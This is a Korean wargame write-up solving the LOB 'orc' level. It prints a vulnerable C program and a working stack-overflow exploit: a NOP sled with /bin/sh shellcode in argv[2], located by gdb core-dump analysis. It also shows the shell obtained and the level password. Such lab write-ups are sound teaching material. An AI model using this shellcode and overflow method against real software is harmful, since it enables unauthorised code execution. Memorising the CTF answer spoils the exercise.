[LOB] goblin -> orc
2019. 7. 28. 23:43ㆍWargame & CTF/LOB
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | /* The Lord of the BOF : The Fellowship of the BOF - orc - egghunter */ #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]) { char buffer[40]; int i; if(argc < 2){ printf("argv error\n"); exit(0); } // egghunter for(i=0; environ[i]; i++) memset(environ[i], 0, strlen(environ[i])); if(argv[1][47] != '\xbf') { printf("stack is still your friend.\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); } | cs |
이제 egghunter가 있기 때문에 에그쉘을 이용하지 못한다.
[buffer(40)][SFP(4)][RET(4)]
argv[2]에 쉘코드를 넣고 RET에 &argv[2]를 넣자.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 | [goblin@localhost tmp]$ ./orc `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ Segmentation fault (core dumped) [goblin@localhost tmp]$ gdb -q orc core Core was generated by `./orc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿ '. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0xbfbfbfbf in ?? () (gdb) x/80x $esp 0xbffff6d0: 0x00000000 0xbffff714 0xbffff724 0x40013868 0xbffff6e0: 0x00000003 0x08048450 0x00000000 0x08048471 0xbffff6f0: 0x08048500 0x00000003 0xbffff714 0x08048390 0xbffff700: 0x0804860c 0x4000ae60 0xbffff70c 0x40013e90 0xbffff710: 0x00000003 0xbffff824 0xbffff82a 0xbffff85b 0xbffff720: 0x00000000 0xbffffc5d 0xbffffc72 0xbffffc8a 0xbffff730: 0xbffffca9 0xbffffccb 0xbffffcdd 0xbffffce9 0xbffff740: 0xbffffeac 0xbffffecb 0xbffffee5 0xbffffefa 0xbffff750: 0xbfffff05 0xbfffff1e 0xbfffff2d 0xbfffff35 0xbffff760: 0xbfffff46 0xbfffff54 0xbfffff62 0xbfffff73 0xbffff770: 0xbfffff81 0xbfffff8c 0xbfffff9e 0xbfffffda 0xbffff780: 0xbfffffe2 0x00000000 0x00000003 0x08048034 0xbffff790: 0x00000004 0x00000020 0x00000005 0x00000006 0xbffff7a0: 0x00000006 0x00001000 0x00000007 0x40000000 0xbffff7b0: 0x00000008 0x00000000 0x00000009 0x08048450 0xbffff7c0: 0x0000000b 0x000001f7 0x0000000c 0x000001f7 0xbffff7d0: 0x0000000d 0x000001f7 0x0000000e 0x000001f7 0xbffff7e0: 0x00000010 0x0f8bfbff 0x0000000f 0xbffff81f 0xbffff7f0: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffff800: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) 0xbffff810: 0x00000000 0x00000000 0x00000000 0x69000000 0xbffff820: 0x00363836 0x726f2f2e 0x41410063 0x41414141 0xbffff830: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff840: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff850: 0x41414141 0xbfbf4141 0x9000bfbf 0x90909090 0xbffff860: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff870: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff880: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff890: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8d0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8e0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff8f0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff900: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff910: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff920: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff930: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff940: 0x90909090 0x90909090 0x90909090 0x90909090 | cs |
Segmentation fault를 띄워서 core를 덤프한다음에 분석한다. 만약 core dumped라는 메시지가 뜨지 않는다면 tmp폴더를 만들어서 orc파일을 복사해서 실행해보면 된다. 그래도 안된다면 ulimit -c unlimited 를 치면 해결될것이다.
0x90 시작부분 <= RET <= 0x90 끝부분 <- 이렇게 RET을 설정하면 0x90(놉코드)는 아무것도 하지 않고 다음 코드를 실행하라는 뜻이므로 쭉 가다가 쉘코드를 만나서 실행되게 된다. 이것을 NOP SLED(놉슬레드)라고 한다. 나는 0xbffff901을 RET 에 넣을것이다.
1 2 3 4 5 6 | [goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\x01\xf9\xff\xbf"'` `python -c 'print "\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA bash$ my-pass euid = 504 cantata | cs |
orc : cantata
'Wargame & CTF > LOB' 카테고리의 다른 글
[LOB] wolfman -> darkelf (0) | 2019.07.28 |
---|---|
[LOB] orc -> wolfman (0) | 2019.07.28 |
[LOB] cobolt -> goblin (0) | 2019.07.28 |
[LOB] gremlin -> cobolt (0) | 2019.07.28 |
[LOB] gate -> gremlin (0) | 2019.07.28 |